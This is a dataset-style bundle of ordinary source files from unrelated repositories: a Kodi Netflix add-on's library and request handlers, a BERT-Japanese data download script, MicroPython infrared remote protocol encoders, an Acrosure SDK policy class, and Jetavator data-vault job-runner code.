Function to generate the stream url
"""
show_meta = '%s' % (title)
folder = alt_title
show_dir = os.path.join(self.tvshow_path, folder)
if not os.path.exists(show_dir):
os.makedirs(show_dir)
if self.show_exists(title) == False:
self.db[self.series_label][show_meta] = {'seasons': [], 'episodes': [], 'alt_title': alt_title}
for episode in episodes:
self._add_episode(show_dir=show_dir, title=title, season=episode['season'], episode=episode['episode'], video_id=episode['id'], build_url=build_url)
self._update_local_db(filename=self.db_filepath, db=self.db)
return show_dir
def _add_episode (self, title, show_dir, season, episode, video_id, build_url):
"""Adds a single episode to the local DB, generates & persists the strm file
Parameters
----------
title : :obj:`str`
Title of the show
show_dir : :obj:`str`
Directory that holds the stream files for that show
season : :obj:`int`
Season sequence number
episode : :obj:`int`
Episode sequence number
video_id : :obj:`str`
ID of the video to be played
build_url : :obj:`fn`
Function to generate the stream url
"""
season = int(season)
episode = int(episode)
# add season
if self.season_exists(title=title, season=season) == False:
self.db[self.series_label][title]['seasons'].append(season)
# add episode
episode_meta = 'S%02dE%02d' % (season, episode)
if self.episode_exists(title=title, season=season, episode=episode) == False:
self.db[self.series_label][title]['episodes'].append(episode_meta)
# create strm file
filename = episode_meta + '.strm'
filepath = os.path.join(show_dir, filename)
if os.path.exists(filepath):
return
self.write_strm_file(path=filepath, url=build_url({'action': 'play_video', 'video_id': video_id}))
def remove_movie (self, title, year):
"""Removes the DB entry & the strm file for the movie given
Parameters
----------
title : :obj:`str`
Title of the movie
year : :obj:`int`
Release year of the movie
Returns
-------
bool
Delete successfull
"""
movie_meta = '%s (%d)' % (title, year)
folder = self.db[self.movies_label][movie_meta]['alt_title']
del self.db[self.movies_label][movie_meta]
self._update_local_db(filename=self.db_filepath, db=self.db)
dirname = os.path.join(self.movie_path, folder)
if os.path.exists(dirname):
rmtree(dirname)
return True
return False
def remove_show (self, title):
"""Removes the DB entry & the strm files for the show given
Parameters
----------
title : :obj:`str`
Title of the show
Returns
-------
bool
Delete successfull
"""
folder = self.db[self.series_label][title]['alt_title']
del self.db[self.series_label][title]
self._update_local_db(filename=self.db_filepath, db=self.db)
show_dir = os.path.join(self.tvshow_path, folder)
if os.path.exists(show_dir):
rmtree(show_dir)
return True
return False
def remove_season (self, title, season):
"""Removes the DB entry & the strm files for a season of a show given
Parameters
----------
title : :obj:`str`
Title of the show
season : :obj:`int`
Season sequence number
Returns
-------
bool
Delete successfull
"""
season = int(season)
season_list = []
episodes_list = []
show_meta = '%s' % (title)
for season_entry in self.db[self.series_label][show_meta]['seasons']:
if season_entry != season:
season_list.append(season_entry)
self.db[self.series_label][show_meta]['seasons'] = season_list
show_dir = os.path.join(self.tvshow_path, self.db[self.series_label][show_meta]['alt_title'])
if os.path.exists(show_dir):
show_files = [f for f in os.listdir(show_dir) if os.path.isfile(os.path.join(show_dir, f))]
for filename in show_files:
if 'S%02dE' % (season) in filename:
os.remove(os.path.join(show_dir, filename))
else:
episodes_list.append(filename.replace('.strm', ''))
self.db[self.series_label][show_meta]['episodes'] = episodes_list
self._update_local_db(filename=self.db_filepath, db=self.db)
return True
def remove_episode (self, title, season, episode):
"""Removes the DB entry & the strm files for an episode of a show given
Parameters
----------
title : :obj:`str`
Title of the show
season : :obj:`int`
Season sequence number
episode : :obj:`int`
Episode sequence number
Returns
-------
bool
Delete successfull
"""
episodes_list = []
show_meta = '%s' % (title)
episode_meta = 'S%02dE%02d' % (season, episode)
show_dir = os.path.join(self.tvshow_path, self.db[self.series_label][show_meta]['alt_title'])
if os.path.exists(os.path.join(show_dir, episode_meta + '.strm')):
os.remove(os.path.join(show_dir, episode_meta + '.strm'))
for episode_entry in self.db[self.series_label][show_meta]['episodes']:
if episode_meta != episode_entry:
episodes_list.append(episode_entry)
self.db[self.series_label][show_meta]['episodes'] = episodes_list
self._update_local_db(filename=self.db_filepath, db=self.db)
return True
```
#### File: resources/lib/NetflixHttpSubRessourceHandler.py
```python
class NetflixHttpSubRessourceHandler:
""" Represents the callable internal server routes & translates/executes them to requests for Netflix"""
def __init__ (self, kodi_helper, netflix_session):
"""Sets up credentials & video_list_cache cache
Assigns the netflix_session/kodi_helper instacnes
Does the initial login if we have user data
Parameters
----------
kodi_helper : :obj:`KodiHelper`
instance of the KodiHelper class
netflix_session : :obj:`NetflixSession`
instance of the NetflixSession class
"""
self.kodi_helper = kodi_helper
self.netflix_session = netflix_session
self.credentials = self.kodi_helper.get_credentials()
self.profiles = []
self.video_list_cache = {}
self.prefetch_login()
def prefetch_login (self):
"""Check if we have stored credentials.
If so, do the login before the user requests it
If that is done, we cache the profiles
"""
if self.credentials['email'] != '' and self.credentials['password'] != '':
if self.netflix_session.is_logged_in(account=self.credentials):
self.netflix_session.refresh_session_data(account=self.credentials)
self.profiles = self.netflix_session.profiles
else:
self.netflix_session.login(account=self.credentials)
self.profiles = self.netflix_session.profiles
else:
self.profiles = []
self.kodi_helper.set_esn(self.netflix_session.esn)
def is_logged_in (self, params):
"""Existing login proxy function
Parameters
----------
params : :obj:`dict` of :obj:`str`
Request params
Returns
-------
:obj:`Requests.Response`
Response of the remote call
"""
if self.credentials['email'] == '' or self.credentials['password'] == '':
return False
return self.netflix_session.is_logged_in(account=self.credentials)
def logout (self, params):
"""Logout proxy function
Parameters
----------
params : :obj:`dict` of :obj:`str`
Request params
Returns
-------
:obj:`Requests.Response`
Response of the remote call
"""
self.profiles = []
self.credentials = {'email': '', 'password': ''}
# delete esn data
self.kodi_helper.delete_manifest_data()
return self.netflix_session.logout()
def login (self, params):
"""Logout proxy function
Parameters
----------
params : :obj:`dict` of :obj:`str`
Request params
Returns
-------
:obj:`Requests.Response`
Response of the remote call
"""
email = params.get('email', [''])[0]
password = params.get('password', [''])[0]
if email != '' and password != '':
self.credentials = {'email': email, 'password': password}
_ret = self.netflix_session.login(account=self.credentials)
self.profiles = self.netflix_session.profiles
return _ret
return None
def list_profiles (self, params):
"""Returns the cached list of profiles
Parameters
----------
params : :obj:`dict` of :obj:`str`
Request params
Returns
-------
:obj:`dict` of :obj:`str`
List of profiles
"""
return self.profiles
def get_esn (self, params):
"""ESN getter function
Parameters
----------
params : :obj:`dict` of :obj:`str`
Request params
Returns
-------
:obj:`str`
Exracted ESN
"""
return self.netflix_session.esn
def fetch_video_list_ids (self, params):
"""Video list ids proxy function (caches video lists)
Parameters
----------
params : :obj:`dict` of :obj:`str`
Request params
Returns
-------
:obj:`list`
Transformed response of the remote call
"""
cached_list = self.video_list_cache.get(self.netflix_session.user_data['guid'], None)
if cached_list != None:
self.kodi_helper.log('Serving cached list for user: ' + self.netflix_session.user_data['guid'])
return cached_list
video_list_ids_raw = self.netflix_session.fetch_video_list_ids()
if 'error' in video_list_ids_raw:
return video_list_ids_raw
return self.netflix_session.parse_video_list_ids(response_data=video_list_ids_raw)
def fetch_video_list (self, params):
"""Video list proxy function
Parameters
----------
params : :obj:`dict` of :obj:`str`
Request params
Returns
-------
:obj:`list`
Transformed response of the remote call
"""
list_id = params.get('list_id', [''])[0]
raw_video_list = self.netflix_session.fetch_video_list(list_id=list_id)
if 'error' in raw_video_list:
return raw_video_list
# parse the video list ids
if 'videos' in raw_video_list.get('value', {}).keys():
return self.netflix_session.parse_video_list(response_data=raw_video_list)
return []
def fetch_episodes_by_season (self, params):
"""Episodes for season proxy function
Parameters
----------
params : :obj:`dict` of :obj:`str`
Request params
Returns
-------
:obj:`list`
Transformed response of the remote call
"""
raw_episode_list = self.netflix_session.fetch_episodes_by_season(season_id=params.get('season_id')[0])
if 'error' in raw_episode_list:
return raw_episode_list
return self.netflix_session.parse_episodes_by_season(response_data=raw_episode_list)
def fetch_seasons_for_show (self, params):
"""Season for show proxy function
Parameters
----------
params : :obj:`dict` of :obj:`str`
Request params
Returns
-------
:obj:`list`
Transformed response of the remote call
"""
show_id = params.get('show_id', [''])[0]
raw_season_list = self.netflix_session.fetch_seasons_for_show(id=show_id)
if 'error' in raw_season_list:
return raw_season_list
# check if we have sesons, announced shows that are not available yet have none
if 'seasons' not in raw_season_list.get('value', {}):
return []
return self.netflix_session.parse_seasons(id=show_id, response_data=raw_season_list)
def rate_video (self, params):
"""Video rating proxy function
Parameters
----------
params : :obj:`dict` of :obj:`str`
Request params
Returns
-------
:obj:`Requests.Response`
Response of the remote call
"""
video_id = params.get('video_id', [''])[0]
rating = params.get('rating', [''])[0]
return self.netflix_session.rate_video(video_id=video_id, rating=rating)
def remove_from_list (self, params):
"""Remove from my list proxy function
Parameters
----------
params : :obj:`dict` of :obj:`str`
Request params
Returns
-------
:obj:`Requests.Response`
Response of the remote call
"""
video_id = params.get('video_id', [''])[0]
return self.netflix_session.remove_from_list(video_id=video_id)
def add_to_list (self, params):
"""Add to my list proxy function
Parameters
----------
params : :obj:`dict` of :obj:`str`
Request params
Returns
-------
:obj:`Requests.Response`
Response of the remote call
"""
video_id = params.get('video_id', [''])[0]
return self.netflix_session.add_to_list(video_id=video_id)
def fetch_metadata (self, params):
"""Metadata proxy function
Parameters
----------
params : :obj:`dict` of :obj:`str`
Request params
Returns
-------
:obj:`Requests.Response`
Response of the remote call
"""
video_id = params.get('video_id', [''])[0]
return self.netflix_session.fetch_metadata(id=video_id)
def switch_profile (self, params):
"""Switch profile proxy function
Parameters
----------
params : :obj:`dict` of :obj:`str`
Request params
Returns
-------
:obj:`Requests.Response`
Response of the remote call
"""
profile_id = params.get('profile_id', [''])[0]
return self.netflix_session.switch_profile(profile_id=profile_id, account=self.credentials)
def get_user_data (self, params):
"""User data getter function
Parameters
----------
params : :obj:`dict` of :obj:`str`
Request params
Returns
-------
:obj:`str`
Exracted User Data
"""
return self.netflix_session.user_data
def search (self, params):
"""Search proxy function
Parameters
----------
params : :obj:`dict` of :obj:`str`
Request params
Returns
-------
:obj:`list`
Transformed response of the remote call
"""
term = params.get('term', [''])[0]
has_search_results = False
raw_search_results = self.netflix_session.fetch_search_results(search_str=term)
# check for any errors
if 'error' in raw_search_results:
return raw_search_results
# determine if we found something
if 'search' in raw_search_results['value']:
for key in raw_search_results['value']['search'].keys():
if self.netflix_session._is_size_key(key=key) == False:
has_search_results = raw_search_results['value']['search'][key]['titles']['length'] > 0
if has_search_results == False:
if raw_search_results['value']['search'][key].get('suggestions', False) != False:
for entry in raw_search_results['value']['search'][key]['suggestions']:
if self.netflix_session._is_size_key(key=entry) == False:
if raw_search_results['value']['search'][key]['suggestions'][entry]['relatedvideos']['length'] > 0:
has_search_results = True
# display that we haven't found a thing
if has_search_results == False:
return []
# list the search results
search_results = self.netflix_session.parse_search_results(response_data=raw_search_results)
# add more menaingful data to the search results
raw_search_contents = self.netflix_session.fetch_video_list_information(video_ids=search_results.keys())
# check for any errors
if 'error' in raw_search_contents:
return raw_search_contents
return self.netflix_session.parse_video_list(response_data=raw_search_contents)
```
|
{
"source": "Jetafull/bert-japanese",
"score": 2
}
|
#### File: bert-japanese/src/data-download-and-extract.py
```python
import configparser
import os
import subprocess
import sys
from urllib.request import urlretrieve
from pathlib import Path
CURDIR = Path(__file__).parent.parent.absolute()
WORKDIR = CURDIR.parent
CONFIGPATH = CURDIR / "config.ini"
config = configparser.ConfigParser()
config.read(CONFIGPATH)
FILEURL = config['DATA']['FILEURL']
FILEPATH = WORKDIR.joinpath(config['DATA']['FILEPATH']).as_posix()
EXTRACTDIR = WORKDIR.joinpath(config['DATA']['TEXTDIR']).as_posix()
def reporthook(blocknum, blocksize, totalsize):
'''
Callback function to show progress of file downloading.
'''
readsofar = blocknum * blocksize
if totalsize > 0:
percent = readsofar * 1e2 / totalsize
s = "\r%5.1f%% %*d / %d" % (
percent, len(str(totalsize)), readsofar, totalsize)
sys.stderr.write(s)
if readsofar >= totalsize: # near the end
sys.stderr.write("\n")
else: # total size is unknown
sys.stderr.write("read %d\n" % (readsofar,))
def download():
urlretrieve(FILEURL, FILEPATH, reporthook)
def extract():
subprocess.call(['python3',
WORKDIR.joinpath('wikiextractor', 'WikiExtractor.py').as_posix(),
FILEPATH, "-o={}".format(EXTRACTDIR)])
def main():
download()
extract()
if __name__ == "__main__":
main()
```
|
{
"source": "jetannenbaum/micropython_ir",
"score": 3
}
|
#### File: micropython_ir/ir_tx/mce.py
```python
from micropython import const
from ir_tx import IR
_TBIT = const(500) # Time (μs) for pulse of carrier
class MCE(IR):
valid = (0xf, 0x3f, 3) # Max addr, data, toggle
init_cs = 4 # http://www.hifi-remote.com/johnsfine/DecodeIR.html#OrtekMCE says 3
def __init__(self, pin, freq=38000, verbose=False):
super().__init__(pin, freq, 34, 30, verbose)
def tx(self, addr, data, toggle):
def checksum(v):
cs = self.init_cs
for _ in range(12):
if v & 1:
cs += 1
v >>= 1
return cs
self.append(2000, 1000, _TBIT)
d = ((data & 0x3f) << 6) | (addr & 0xf) | ((toggle & 3) << 4)
d |= checksum(d) << 12
self.verbose and print(bin(d))
mask = 1
while mask < 0x10000:
bit = bool(d & mask)
if bit ^ self.carrier:
self.add(_TBIT)
self.append(_TBIT)
else:
self.append(_TBIT, _TBIT)
mask <<= 1
```
#### File: micropython_ir/ir_tx/philips.py
```python
from micropython import const
from ir_tx import IR
# Philips RC5 protocol
_T_RC5 = const(889) # Time for pulse of carrier
class RC5(IR):
valid = (0x1f, 0x3f, 1) # Max addr, data, toggle
def __init__(self, pin, freq=36000, verbose=False):
super().__init__(pin, freq, 28, 30, verbose)
def tx(self, addr, data, toggle): # Fix RC5X S2 bit polarity
d = (data & 0x3f) | ((addr & 0x1f) << 6) | (((data & 0x40) ^ 0x40) << 6) | ((toggle & 1) << 11)
self.verbose and print(bin(d))
mask = 0x2000
while mask:
if mask == 0x2000:
self.append(_T_RC5)
else:
bit = bool(d & mask)
if bit ^ self.carrier:
self.add(_T_RC5)
self.append(_T_RC5)
else:
self.append(_T_RC5, _T_RC5)
mask >>= 1
# Philips RC6 mode 0 protocol
_T_RC6 = const(444)
_T2_RC6 = const(889)
class RC6_M0(IR):
valid = (0xff, 0xff, 1) # Max addr, data, toggle
def __init__(self, pin, freq=36000, verbose=False):
super().__init__(pin, freq, 44, 30, verbose)
def tx(self, addr, data, toggle):
# leader, 1, 0, 0, 0
self.append(2666, _T2_RC6, _T_RC6, _T2_RC6, _T_RC6, _T_RC6, _T_RC6, _T_RC6, _T_RC6)
# Append a single bit of twice duration
if toggle:
self.add(_T2_RC6)
self.append(_T2_RC6)
else:
self.append(_T2_RC6, _T2_RC6)
d = (data & 0xff) | ((addr & 0xff) << 8)
mask = 0x8000
self.verbose and print('toggle', toggle, self.carrier, bool(d & mask))
while mask:
bit = bool(d & mask)
if bit ^ self.carrier:
self.append(_T_RC6, _T_RC6)
else:
self.add(_T_RC6)
self.append(_T_RC6)
mask >>= 1
```
#### File: micropython_ir/ir_tx/sony.py
```python
from micropython import const
from ir_tx import IR
class SONY_ABC(IR):
def __init__(self, pin, bits, freq, verbose):
super().__init__(pin, freq, 3 + bits * 2, 30, verbose)
if bits not in (12, 15, 20):
raise ValueError('bits must be 12, 15 or 20.')
self.bits = bits
def tx(self, addr, data, ext):
self.append(2400, 600)
bits = self.bits
v = data & 0x7f
if bits == 12:
v |= (addr & 0x1f) << 7
elif bits == 15:
v |= (addr & 0xff) << 7
else:
v |= (addr & 0x1f) << 7
v |= (ext & 0xff) << 12
for _ in range(bits):
self.append(1200 if v & 1 else 600, 600)
v >>= 1
# Sony specifies 40KHz
class SONY_12(SONY_ABC):
valid = (0x1f, 0x7f, 0) # Max addr, data, toggle
def __init__(self, pin, freq=40000, verbose=False):
super().__init__(pin, 12, freq, verbose)
class SONY_15(SONY_ABC):
valid = (0xff, 0x7f, 0) # Max addr, data, toggle
def __init__(self, pin, freq=40000, verbose=False):
super().__init__(pin, 15, freq, verbose)
class SONY_20(SONY_ABC):
valid = (0x1f, 0x7f, 0xff) # Max addr, data, toggle
def __init__(self, pin, freq=40000, verbose=False):
super().__init__(pin, 20, freq, verbose)
```
#### File: micropython_ir/ir_tx/test.py
```python
from sys import platform
ESP32 = platform == 'esp32'
RP2 = platform == 'rp2'
PYBOARD = platform == 'pyboard'
if ESP32 or RP2:
from machine import Pin
else:
from pyb import Pin, LED
import uasyncio as asyncio
from primitives.switch import Switch
from primitives.delay_ms import Delay_ms
# Import all implemented classes
from ir_tx.nec import NEC
from ir_tx.sony import SONY_12, SONY_15, SONY_20
from ir_tx.philips import RC5, RC6_M0
loop = asyncio.get_event_loop()
# If button is held down normal behaviour is to retransmit
# but most NEC models send a REPEAT code
class Rbutton:
toggle = 1 # toggle is ignored in NEC mode
def __init__(self, irb, pin, addr, data, proto):
self.irb = irb
self.sw = Switch(pin)
self.addr = addr
self.data = data
self.proto = proto
self.sw.close_func(self.cfunc)
self.sw.open_func(self.ofunc)
self.tim = Delay_ms(self.repeat)
def cfunc(self): # Button push: send data
tog = 0 if self.proto < 3 else Rbutton.toggle # NEC, sony 12, 15: toggle==0
self.irb.transmit(self.addr, self.data, tog, True) # Test validation
# Auto repeat. The Sony protocol specifies 45ms but this is tight.
# In 20 bit mode a data burst can be upto 39ms long.
self.tim.trigger(108)
def ofunc(self): # Button release: cancel repeat timer
self.tim.stop()
Rbutton.toggle ^= 1 # Toggle control
async def repeat(self):
await asyncio.sleep(0) # Let timer stop before retriggering
if not self.sw(): # Button is still pressed: retrigger
self.tim.trigger(108)
if self.proto == 0:
self.irb.repeat() # NEC special case: send REPEAT code
else:
tog = 0 if self.proto < 3 else Rbutton.toggle # NEC, sony 12, 15: toggle==0
self.irb.transmit(self.addr, self.data, tog, True) # Test validation
async def main(proto):
# Test uses a 38KHz carrier.
if ESP32: # Pins for IR LED gate
pin = Pin(23, Pin.OUT, value = 0)
elif RP2:
pin = Pin(17, Pin.OUT, value = 0)
else:
pin = Pin('X1')
classes = (NEC, SONY_12, SONY_15, SONY_20, RC5, RC6_M0)
irb = classes[proto](pin, 38000) # My decoder chip is 38KHz
# Uncomment the following to print transmit timing
# irb.timeit = True
b = [] # Rbutton instances
px3 = Pin('X3', Pin.IN, Pin.PULL_UP) if PYBOARD else Pin(18, Pin.IN, Pin.PULL_UP)
px4 = Pin('X4', Pin.IN, Pin.PULL_UP) if PYBOARD else Pin(19, Pin.IN, Pin.PULL_UP)
b.append(Rbutton(irb, px3, 0x1, 0x7, proto))
b.append(Rbutton(irb, px4, 0x10, 0xb, proto))
if ESP32:
while True:
print('Running')
await asyncio.sleep(5)
elif RP2:
led = Pin(25, Pin.OUT)
while True:
await asyncio.sleep_ms(500) # Obligatory flashing LED.
led(not led())
else:
led = LED(1)
while True:
await asyncio.sleep_ms(500) # Obligatory flashing LED.
led.toggle()
# Greeting strings. Common:
s = '''Test for IR transmitter. Run:
from ir_tx.test import test
test() for NEC protocol
test(1) for Sony SIRC 12 bit
test(2) for Sony SIRC 15 bit
test(3) for Sony SIRC 20 bit
test(4) for Philips RC-5 protocol
test(5) for Philips RC-6 mode 0.
'''
# Pyboard:
spb = '''
IR LED on pin X1
Ground pin X3 to send addr 1 data 7
Ground pin X4 to send addr 0x10 data 0x0b.'''
# ESP32
sesp = '''
IR LED gate on pin 23
Ground pin 18 to send addr 1 data 7
Ground pin 19 to send addr 0x10 data 0x0b.'''
# RP2
srp2 = '''
IR LED gate on pin 17
Ground pin 18 to send addr 1 data 7
Ground pin 19 to send addr 0x10 data 0x0b.'''
if ESP32:
print(''.join((s, sesp)))
elif RP2:
print(''.join((s, srp2)))
else:
print(''.join((s, spb)))
def test(proto=0):
loop.run_until_complete(main(proto))
```
|
{
"source": "jetarin-min/acrosure-py-sdk",
"score": 3
}
|
#### File: acrosure-py-sdk/acrosure_sdk/policy.py
```python
class PolicyManager:
"""
Represents an PolicyManager. (You most likely shouldn't be accessing this directly, use {@link AcrosureClient#policy} instead.)
"""
def __init__( self, id, call_api ):
"""
Parameters
----------
id: str
A policy id.
call_api : function
A function which call Acrosure API.
"""
self.id = id
self.call_api = call_api
def set_id( self, id ):
"""
Set current policy id.
Parameters
----------
id : str
A policy id.
"""
self.id = id
def get( self, id = None ):
"""
Get policy with specify id or with current id.
Parameters
----------
id : str, optional
A policy id.
Returns
-------
dict
Policy.
"""
try:
if id:
self.id = id
# resp = self.call_api("/policies/get", {
resp = self.call_api("/success", {
"policy_id": self.id
})
return resp
except Exception as err:
raise err
def list( self, query ):
"""
Get policies list with or without query.
Parameters
----------
query : dict
Query object (See Acrosure API document for more detail).
Returns
-------
list
Policies.
"""
try:
resp = self.call_api("/policies/list", query)
return resp
except Exception as err:
raise err
```
|
{
"source": "jetavator/jetavator_databricks",
"score": 2
}
|
#### File: jetavator_databricks_client/jetavator_databricks_client/LogListener.py
```python
from azure.core.exceptions import ResourceNotFoundError
from lazy_property import LazyProperty
MESSAGE_BATCH_SIZE = 32
class LogListener(object):
def __init__(self, config, storage_service):
self.config = config
self.storage_service = storage_service
print(
'Listening for log events for run_uuid '
f'[{self.config.session.run_uuid}]',
flush=True
)
def __iter__(self):
while True:
messages = list(
self.queue.receive_messages(
messages_per_page=MESSAGE_BATCH_SIZE
)
if self.queue_exists
else []
)
if not messages:
break
for message in messages:
yield message.content
self.queue.delete_message(message)
@property
def queue_name(self):
return f'jetavator-log-{self.config.session.run_uuid}'
@LazyProperty
def queue(self):
return self.storage_service.queue_client(self.queue_name)
@property
def queue_exists(self):
try:
self.queue.get_queue_properties()
return True
except ResourceNotFoundError:
return False
def delete_queue(self):
self.queue.delete_queue()
```
#### File: jetavator_databricks_local/services/LocalDatabricksService.py
```python
import os
from jetavator.services import SparkService
from lazy_property import LazyProperty
from pyspark.sql import SparkSession
SPARK_APP_NAME = 'jetavator'
class LocalDatabricksService(SparkService, register_as="local_databricks"):
@property
def logger_config(self):
return {
'version': 1,
'formatters': {
'verbose': {
'format': '%(asctime)s %(levelname)s %(hostname)s %(process)d %(message)s',
},
},
'handlers': {
'queue': {
'service': self.owner.logs_storage_service,
'protocol': 'https',
'queue': f'jetavator-log-{self.owner.config.session.run_uuid}',
'level': 'DEBUG',
'class': 'jetavator_databricks_local.logging.azure_queue_logging.AzureQueueHandler',
'formatter': 'verbose',
},
},
'loggers': {
'jetavator': {
'handlers': ['queue'],
'level': 'DEBUG',
},
}
}
@property
def azure_storage_key(self):
return self.owner.source_storage_service.config.account_key
@property
def azure_storage_container(self):
return self.owner.source_storage_service.config.blob_container_name
@property
def azure_storage_location(self):
return (
f'{self.owner.source_storage_service.config.account_name}.'
'blob.core.windows.net'
)
@LazyProperty
def dbutils(self):
import IPython
return IPython.get_ipython().user_ns["dbutils"]
@property
def spark(self):
spark_session = (
SparkSession
.builder
.appName(SPARK_APP_NAME)
.enableHiveSupport()
.getOrCreate()
)
storage_key_name = f'fs.azure.account.key.{self.azure_storage_location}'
mount_point = f'/mnt/{self.azure_storage_container}'
if not os.path.exists(f'/dbfs/{mount_point}'):
self.owner.source_storage_service.create_container_if_not_exists()
self.dbutils.fs.mount(
source=(
f'wasbs://{self.azure_storage_container}@'
f'{self.azure_storage_location}'
),
mount_point=mount_point,
extra_configs={
storage_key_name: self.azure_storage_key
}
)
return spark_session
def csv_file_path(self, source_name: str):
return (
f'/mnt/{self.azure_storage_container}/'
f'{self.config.schema}/'
f'{self.owner.config.session.run_uuid}/'
f'{source_name}.csv'
)
def source_csv_exists(self, source_name: str):
return os.path.exists('/dbfs/' + self.csv_file_path(source_name))
def load_csv(self, csv_file, source_name: str):
# TODO: Either implement this or remove if from the superclass interface
raise NotImplementedError()
```
|
{
"source": "jetavator/jetavator",
"score": 3
}
|
#### File: runners/jobs/DropSource.py
```python
from abc import ABC
from typing import List
from jetavator.schema_registry import Source
from .. import Job, Runner
class DropSource(Job, ABC, register_as='drop_source'):
"""
Drop the temporary table for a source CSV file.
:param runner: The `Runner` that created this object.
:param source: The `Source` object containing the source definitions.
"""
def __init__(self, runner: Runner, source: Source) -> None:
super().__init__(runner, source)
self.source = source
@property
def name(self) -> str:
return f'drop_source_{self.source.name}'
@property
def dependencies(self) -> List[Job]:
return [
self.runner.get_job('satellite_query', satellite)
for satellite in self.source.dependent_satellites
]
@property
def csv_path(self) -> str:
"""
:return: Returns the path to the supplied `Source` CSV file.
"""
return self.runner.compute_service.csv_file_path(self.source.name)
```
#### File: runners/jobs/SatelliteOwnerKeys.py
```python
from abc import ABC
from typing import List
from jetavator.schema_registry import SatelliteOwner
from .. import Job, Runner
class SatelliteOwnerKeys(Job, ABC, register_as='satellite_owner_keys'):
"""
Collects all the key values for any `Satellite` row that has been created,
updated or deleted for this particular `Hub` or `Link`.
:param runner: The `Runner` that created this object.
:param satellite_owner: The `Hub` or `Link` object that is being used to create
a Dimension or Fact table, respectively.
"""
def __init__(
self,
runner: Runner,
satellite_owner: SatelliteOwner
) -> None:
super().__init__(runner, satellite_owner)
self.satellite_owner = satellite_owner
@property
def name(self) -> str:
return f'keys_{self.satellite_owner.full_name}'
@property
def dependencies(self) -> List[Job]:
return [
self.runner.get_job('output_keys', satellite, self.satellite_owner)
for satellite
in self.satellite_owner.satellites_containing_keys.values()
]
```
#### File: runners/jobs/StarData.py
```python
from abc import ABC
from typing import List
from jetavator.schema_registry import SatelliteOwner
from .. import Job, Runner
class StarData(Job, ABC, register_as='star_data'):
"""
Computes the created, updated or deleted rows for the star schema table
for this particular `Hub` or `Link`.
:param runner: The `Runner` that created this object.
:param satellite_owner: The `Hub` or `Link` object that is being used to create
a Dimension or Fact table, respectively.
"""
def __init__(
self,
runner: Runner,
satellite_owner: SatelliteOwner
) -> None:
super().__init__(runner, satellite_owner)
self.satellite_owner = satellite_owner
@property
def name(self) -> str:
return f'updates_{self.satellite_owner.star_table_name}'
@property
def satellite_owner_keys_job(self) -> Job:
"""
:return: The `SatelliteOwnerKeys` job that contains the updated keys.
"""
return self.runner.get_job('satellite_owner_keys', self.satellite_owner)
@property
def satellite_query_jobs(self) -> List[Job]:
"""
:return: A list of the `SatelliteQuery` jobs that contain the updated data.
"""
return [
self.runner.get_job('satellite_query', satellite)
for satellite in self.satellite_owner.star_satellites.values()
]
@property
def dependencies(self) -> List[Job]:
return [
self.satellite_owner_keys_job,
*self.satellite_query_jobs
]
```
#### File: jetavator/runners/Runner.py
```python
from __future__ import annotations # Remove in Python 3.8
from abc import ABC
import pandas as pd
from logging import Logger
from typing import Dict, List, Type
from lazy_property import LazyProperty
from wysdom.mixins import RegistersSubclasses
from jetavator import Engine
from jetavator.schema_registry import Project, Source, Satellite, SatelliteOwner, VaultObject
from jetavator.services import ComputeService
from .Job import Job
from .JobState import JobState
from jetavator.runners.RunnerABC import RunnerABC
class Runner(RegistersSubclasses, RunnerABC, ABC):
job_class: Job = Job
def __init__(
self,
engine: Engine,
compute_service: ComputeService,
project: Project
):
"""
Default constructor to be inherited by subclasses.
Not intended for direct use: use
:py:meth:`from_compute_service` instead.
"""
super().__init__()
self.engine = engine
self.compute_service = compute_service
self.project = project
@classmethod
def from_compute_service(
cls,
engine: Engine,
compute_service: ComputeService,
project: Project
) -> Runner:
"""
Constructor that takes an :py:class:`~jetavator.Engine`,
a :py:class:`~jetavator.services.ComputeService` and
a :py:class:`~jetavator.schema_registry.Project`
and returns a registered subclass
of `Runner` as specified in `compute_service.config.type`
"""
return cls.registered_subclass_instance(
compute_service.config.type,
engine,
compute_service,
project
)
@property
def logger(self) -> Logger:
"""
Python `Logger` instance for raising log messages.
"""
return self.engine.logger
@LazyProperty
def jobs(self) -> Dict[str, Job]:
"""
Dictionary of all Jobs in the Runner, indexed by unique
string representation of the job key.
"""
return {
str(job.key): job
for job in self._create_jobs()
}
@property
def blocked_jobs(self) -> Dict[str, Job]:
"""
Subset of `jobs` that are blocked from running by other jobs
that they depend on.
"""
return self.jobs_in_state([JobState.BLOCKED])
@property
def ready_jobs(self) -> Dict[str, Job]:
"""
Subset of `jobs` whose dependencies have all finished and are
ready to start running.
"""
return self.jobs_in_state([JobState.READY])
@property
def running_jobs(self) -> Dict[str, Job]:
"""
Subset of `jobs` that are currently running.
"""
return self.jobs_in_state([JobState.RUNNING])
@property
def finished_jobs(self) -> Dict[str, Job]:
"""
Subset of `jobs` that have recently finished, but are not yet
acknowledged by the Runner.
"""
return self.jobs_in_state([JobState.FINISHED])
@property
def acknowledged_jobs(self) -> Dict[str, Job]:
"""
Subset of `jobs` that are finished and acknowledged.
"""
return self.jobs_in_state([JobState.ACKNOWLEDGED])
def get_job(
self,
registered_name: str,
*args: VaultObject
) -> Job:
"""
:param registered_name: The registered subclass name of the job.
:param args: A variable-length list of `VaultObject` instances
associated with the Job. The number and types
of these objects depends on the subclass
implementation.
:return: An existing Job matching the supplied key values.
"""
return self.jobs[Job.job_key(registered_name, *args)]
def run(self) -> None:
"""
Run the workload management algorithm to run all the jobs
in dependency order.
"""
self._start_ready_jobs()
if not self.running_jobs and not self.finished_jobs:
raise RuntimeError("Dependency error. No jobs could be started.")
while self.running_jobs or self.finished_jobs:
self._check_for_finished_jobs()
if self.finished_jobs:
self._acknowledge_finished_jobs()
self._start_ready_jobs()
def jobs_in_state(self, states: List[JobState]) -> Dict[str, Job]:
"""
Return a dictionary of jobs in a list of states.
:param states: A list of `JobState`s to search for.
"""
return {
name: job
for name, job in self.jobs.items()
if job.state in states
}
def performance_data(self) -> pd.DataFrame:
"""
A Pandas `DataFrame` containing the queue, wait and execution
time for each job.
"""
return pd.DataFrame([
(
key,
'.'.join(job.primary_vault_object.key),
job.registered_name,
job.queue_time,
job.wait_time,
job.execution_time.total_seconds()
)
for key, job in self.jobs.items()
], columns=[
'key',
'primary_vault_object_key',
'class_name',
'queue_time',
'wait_time',
'execution_time'
])
def _check_for_finished_jobs(self) -> None:
for job in self.running_jobs.values():
job.check_if_finished()
def _acknowledge_finished_jobs(self) -> None:
for job in self.finished_jobs.values():
job.acknowledge()
def _start_ready_jobs(self) -> None:
self._find_ready_jobs()
